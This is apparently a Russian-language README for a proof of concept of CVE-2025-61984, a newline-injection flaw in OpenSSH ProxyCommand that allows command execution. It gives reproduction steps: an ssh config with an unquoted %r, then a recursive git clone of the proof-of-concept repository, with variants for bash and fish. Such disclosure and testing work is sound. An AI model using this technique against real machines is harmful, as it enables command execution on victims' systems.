
Доказательство концепции, демонстрирующее уязвимость внедрения символа новой строки в OpenSSH ProxyCommand (CVE-2025-61984), позволяющую выполнение команд через специально сформированную конфигурацию SSH.
Это proof of concept, использующий перевод строки для обмана ProxyCommand в OpenSSH <10.1. Полное описание.
Создайте .ssh/config, содержащий:
Host *.example.com
ProxyCommand some-command %r@%h:%p
(Команда не важна, главное — чтобы в аргументах был незакавыченный %r.)
Затем выполните (для bash):
$ git clone --recursive https://github.com/dgl/cve-2025-61984-poc
Или если в качестве $SHELL используется fish:
git clone --recursive -b fish https://github.com/dgl/cve-2025-61984-poc
Если вы не используете эту оболочку, но хотите проверить уязвимость, можно сделать так:
$ SHELL=/bin/bash git clone --recursive https://github.com/dgl/cve-2025-61984-poc